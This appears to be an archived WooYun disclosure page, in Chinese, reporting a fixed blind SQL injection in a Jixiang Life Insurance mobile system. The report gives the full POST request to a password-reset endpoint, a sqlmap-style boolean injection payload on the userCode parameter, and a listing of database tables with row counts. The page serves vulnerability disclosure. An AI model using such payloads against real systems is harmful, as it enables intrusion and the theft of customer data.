吉祥人寿某系统Oracle注入漏洞 | wooyun-2015-0158847| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158847

漏洞标题：吉祥人寿某系统Oracle注入漏洞

漏洞作者：无名人

提交时间：2015-12-06 17:12

修复时间：2016-01-19 09:45

公开时间：2016-01-19 09:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-06：细节已通知厂商并且等待厂商处理中
2015-12-07：厂商已经确认，细节仅向厂商公开
2015-12-17：细节向核心白帽子及相关领域专家公开
2015-12-27：细节向普通白帽子公开
2016-01-06：细节向实习白帽子公开
2016-01-19：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

详细说明：

漏洞系统：http://mobile.jxlife.com.cn/
漏洞地址：

POST /servlet/process.action HTTP/1.1
Host: mobile.jxlife.com.cn
Proxy-Connection: keep-alive
Content-Length: 123
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.5.0
Origin: http://mobile.jxlife.com.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://mobile.jxlife.com.cn/sys/getUserPsw.jsp?type=forgetPsw
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=00009c2jYA5WXYrGQqaeWo_fOuO:-1
beanId=UserPswAction&operation=reSetPsw&userCode=admin*&type=forgetPsw&userName=%E6%A8%A1%E5%8E%8B&IDNo=&mobileNo=&eMail=&_=

userCode参数存在布尔注入

---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: beanId=UserPswAction&operation=reSetPsw&userCode=admin') AND 2131=2
131 AND ('xgpO'='xgpO&type=forgetPsw&userName=%E4%BA%8B%E4%B8%8E%E6%84%BF%E8%BF%
9D&IDNo=&mobileNo=&eMail=&_=
---
[12:29:17] [INFO] testing MySQL
[12:29:17] [WARNING] the back-end DBMS is not MySQL
[12:29:17] [INFO] testing Oracle
[12:29:17] [INFO] confirming Oracle
[12:29:17] [INFO] the back-end DBMS is Oracle
web application technology: Apache
back-end DBMS: Oracle

漏洞证明：

数据库：

数据量不少：

Database: YDZY
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| FORMLSHEALTH              | 2341224 |
| OPERATORHISTORY           | 570949  |
| LSPOL                     | 242818  |
| LDSYSREQUESTLOG           | 219201  |
| LDSYSLOG                  | 200223  |
| LDSYSIMAGES               | 185005  |
| LSCONT                    | 160176  |
| LSSUGGESTPUBELEMENT       | 157769  |
| SUGTOEFORM                | 157193  |
| LSLATNCYCUSTMTRANS        | 143403  |
| LSSUGGESTPRIELEMENT       | 128451  |
| FORMLSPICINFO             | 125319  |
| LSAPPNT                   | 123111  |
| LSINSURED                 | 121650  |
| CV_1303                   | 114264  |
| CV_112201                 | 85864   |
| DIV_112201                | 85864   |
| DIV_212204                | 85864   |
| LSREMIND                  | 80497   |
| FORMLSPOL                 | 74332   |
| LSLATNCYCUSTM             | 58144   |
| CV_5003                   | 52594   |
| DIV_5003                  | 51960   |
| FNAPDFHIS                 | 46894   |
| CV_111201                 | 42276   |
| DIV_111201                | 42276   |
| SAVAINSUANDAPPFLAG        | 39024   |
| LSUSERDEVICE              | 38592   |
| CV_111203                 | 37216   |
| DIV_111203                | 37216   |
| CV_113201                 | 35448   |
| CV_128101                 | 35448   |
| DIV_113201                | 35448   |
| CV_118102                 | 33378   |
| CV_218101                 | 33378   |
| LSMESSAGEHISTORY          | 33323   |
| FORMLSCONT                | 32430   |
| FORMLSREPAY               | 32430   |
| FORMLSAPPNT               | 32429   |
| FORMLSINSURED             | 32428   |
| FORMSTATE                 | 31894   |
| CV_124101                 | 28444   |
| CV_128103                 | 28444   |
| CV_124103                 | 26790   |
| CV_128105                 | 26790   |
| CV_212205                 | 26670   |
| CV_228101                 | 26670   |
| DIV_212205                | 26670   |
| FORMLSPAYINFO             | 25545   |
| LAQUALIFICATION           | 20276   |
| CV_211101                 | 17914   |
| CV_212204                 | 17054   |
| LSUSER                    | 13818   |
| CV_211102                 | 11920   |
| LSUSERPSWHISTORY          | 10723   |
| CV_111202                 | 10200   |
| CV_611201                 | 10200   |
| DIV_111202                | 10200   |
| DIV_611201                | 10200   |
| LDCODE                    | 7891    |
| CV_112202                 | 7360    |
| CV_128102                 | 7360    |
| DIV_112202                | 7360    |
| LSACTIVITYWARNINGRECORD   | 7282    |
| LDMAXNO                   | 7182    |
| CV_129102                 | 6600    |
| CV_129104                 | 6600    |
| CV_629101                 | 6600    |
| LSCANDIDATEINFO           | 6260    |
| HOSPITALPOSITION          | 6010    |
| LSCOM                     | 5984    |
| LSUSERTRANS               | 5871    |
| USERCODETRANS             | 5227    |
| INVESTRISKDATA            | 4866    |
| FORMLSBENEFI              | 4597    |
| CV_212203                 | 3770    |
| DIV_212203                | 3770    |
| CV_124102                 | 3588    |
| CV_112203                 | 2710    |
| CV_128104                 | 2710    |
| DIV_112203                | 2710    |
| LSRENEWALVISIT            | 2524    |
| LSRENEWALVISITPOL         | 2524    |
| FNAANSWER                 | 2222    |
| CV_2007                   | 2160    |
| LDOCCUPATION              | 2011    |
| CV_2002                   | 1488    |
| LSUSERTEAM                | 1256    |
| RATE_212205               | 1144    |
| RATE_228101               | 1144    |
| FORMLSPRTID               | 1095    |
| RATE_112201               | 1082    |
| CALCUTEELEMET             | 1017    |
| T_CUSTOMER                | 1000    |
| PROCEEDSEXPRESS           | 966     |
| RATE_124103               | 948     |
| RATE_128105               | 948     |
| CV_1104                   | 912     |
| RATE_2005                 | 746     |
| RATE_EFG                  | 746     |
| RATE_1303                 | 714     |
| FORMLSREPAYMAIN           | 696     |
| FORMLSHEALTHEXP           | 672     |
| LSACTIVITY                | 647     |
| RATE_5003                 | 634     |
| DIV_2007                  | 560     |
| LSLATNCYCUSTMFAMILY       | 559     |
| RATE_211102               | 534     |
| GP_111201                 | 532     |
| RATE_111201               | 532     |
| RATE_124101               | 532     |
| RATE_128103               | 532     |
| RATE_111203               | 492     |
| RATE_113201               | 458     |
| RATE_128101               | 458     |
| LSITEMDATALINK            | 422     |
| LSDATAITEM                | 421     |
| RATE_118102               | 418     |
| RATE_218101               | 418     |
| RATE_111202               | 408     |
| RATE_118201               | 408     |
| RATE_611201               | 408     |
| COMMISSIONPLUSSEQUESTRATE | 396     |
| FNAFIMAILYRELATIONS       | 380     |
| RATE_124102               | 380     |
| COMMISSIONDETAIL          | 352     |
| RATE_211101               | 348     |
| LMCALMODE                 | 332     |
| RATE_129102               | 264     |
| RATE_129104               | 264     |
| RATE_629101               | 264     |
| RATE_212203               | 258     |
| FNACUSTOMDATA             | 244     |
| RISKPLANANDRISKSALECONF   | 236     |
| LMCHECKFIELD              | 234     |
| LSRPTRANSRECORD           | 229     |
| LSRENEWALPAY              | 217     |
| RATE_212204               | 214     |
| RISKRATE_122301           | 212     |
| RISKRATE_123301           | 212     |
| RISKRATE_222302           | 212     |
| LDSYSVAR                  | 195     |
| LSMODELLINK               | 187     |
| FEETENCENT                | 183     |
| LMRISKSCREEN              | 179     |
| CV_1106                   | 178     |
| DIV_1106                  | 178     |
| LDCOMGRPTOCOM             | 172     |
| POLDETAILCARE             | 158     |
| FNAZ                      | 152     |
| STATICMSGURL              | 142     |
| LMRISKPARAM               | 135     |
| LSCLAIMINFO               | 129     |
| RATE_112202               | 128     |
| RATE_128102               | 128     |
| UPLOADPICFILE             | 125     |
| RATE_112203               | 118     |
| RATE_128104               | 118     |
| FNASINGLE                 | 116     |
| RATE_2007                 | 114     |
| FNAINSURANCEDATA          | 113     |
| AVLSP_PL                  | 106     |
| LDSYSIMAGECHEKDETAIL      | 99      |
| FNAFEEDATA                | 98      |
| LMRISKROLE                | 98      |
| FORMLSHEALTHSUBJECT       | 96      |
| YIBEIFEIYONG              | 95      |
| RATE_2002                 | 92      |
| FNAINCOMEDATA             | 89      |
| GERENBAOXIAOSHOUXIAN      | 88      |
| POLDETAILFIRSTYEAR        | 88      |
| YINGBEITABLE              | 88      |
| RISKPLAN                  | 85      |
| LSGOLDPSW                 | 84      |
| REMINDREAD                | 84      |
| LSAGENTMENUGRPTOMENU      | 83      |
| LSTAXES                   | 78      |
| LSLATNCYCUSTMINTRODUCE    | 77      |
| LMRISKSCREENVALIDATE      | 74      |
| POLDETAILCONTINUE         | 74      |
| QITASHOURU                | 73      |
| RATE_1104                 | 72      |
| QITAFEIYONG               | 71      |
| FNACHILDREN               | 70      |
| LSAGENTMENU               | 70      |
| TB_222301                 | 62      |
| TB_222302                 | 62      |
| FNAINVESTARGDATA          | 60      |
| LSCOMTRANS                | 56      |
| LSCOMPARAM                | 55      |
| LSLATNCYCUSTMIMPDATE      | 55      |
| FNAINVESTDATA             | 54      |
| FORMLSHEALTHVERCOD        | 51      |
| ZICHAN                    | 51      |
| LMDUTY                    | 50      |
| LMDUTYGET                 | 49      |
| LMDUTYGETRELA             | 49      |
| LMDUTYPAY                 | 49      |
| LMDUTYPAYRELA             | 49      |
| LMRISKDUTY                | 49      |
| FNAMANY                   | 48      |
| ZHANRISK                  | 47      |
| LMRISK                    | 45      |
| DEVELOPMENTACTIVITY       | 44      |
| KHZL                      | 44      |
| LMRISKRELA                | 43      |
| LSPLANCODE                | 42      |
| LMRISKAPP                 | 40      |
| LMRISKCOMCTRL             | 40      |
| FNALOANDATA               | 39      |
| QITADAIKUAN               | 38      |
| LSRISKITEM                | 37      |
| PACKAGEMANAGE             | 36      |
| LSITEM                    | 35      |
| JIAOYUFEIYONG             | 34      |
| LSPAYPERMONTH             | 34      |
| FNAPARA                   | 31      |
| FNAMAIN                   | 30      |
| TB_122301                 | 30      |
| FNASYSPARAM               | 29      |
| FNAOTHTAGPAYDATA          | 26      |
| LDSYSIMAGECHECK           | 26      |
| LSSEQUENCEACTIVITY        | 26      |
| LSAPPEDPOL                | 24      |
| FNARETPAYDATA             | 22      |
| JIAOYUFEIYONGFJ           | 22      |
| LSCOMSTATUSTRACE          | 21      |
| RATE_1106                 | 18      |
| LSAGENTMENUGRP            | 14      |
| LSUSERUNREALGROUPMEMBER   | 14      |
| AUTHORIZDBANKINFO         | 12      |
| LSHEALTHINFORM            | 12      |
| LSSECONDOPRATOR           | 12      |
| LSUSERPARAMS              | 12      |
| LSWORDMSG                 | 12      |
| LSUSERUNREALGROUP         | 10      |
| TB_212302                 | 10      |
| XIALACAIDAN               | 9       |
| LSKNOWLEDGEBASEITEM       | 8       |
| LSNOTICE                  | 7       |
| LDCOMGRP                  | 6       |
| RATE_128204               | 6       |
| RATE_128205               | 6       |
| RATE_129101               | 6       |
| LMRISKSALEGROUPTORISK     | 5       |
| LSACTIVITYDONEHISTORY     | 4       |
| NOTICE                    | 4       |
| LSBENIFIT                 | 3       |
| POLSHORTCONTINUE          | 3       |
| LMRISKSALEGROUP           | 2       |
| LSMODEL                   | 2       |
| LSPRTANDEFORMNO           | 2       |
| LSPHOTO                   | 1       |
| PUSHHISTORY               | 1       |
+---------------------------+---------+

看你们以前的洞rank都不高，注入求个10rank可好?

修复方案：

版权声明：转载请注明来源无名人@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-12-07 14:43

厂商回复：

属于内部业务系统，谢谢关注！
我们将核实修复。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158847

漏洞标题：吉祥人寿某系统Oracle注入漏洞

相关厂商：吉祥人寿保险股份有限公司

漏洞作者：无名人

提交时间：2015-12-06 17:12

修复时间：2016-01-19 09:45

公开时间：2016-01-19 09:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源无名人@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158847

漏洞标题：吉祥人寿某系统Oracle注入漏洞

相关厂商：吉祥人寿保险股份有限公司

漏洞作者： 无名人

提交时间：2015-12-06 17:12

修复时间：2016-01-19 09:45

公开时间：2016-01-19 09:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0158847"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 无名人@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：无名人

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源无名人@乌云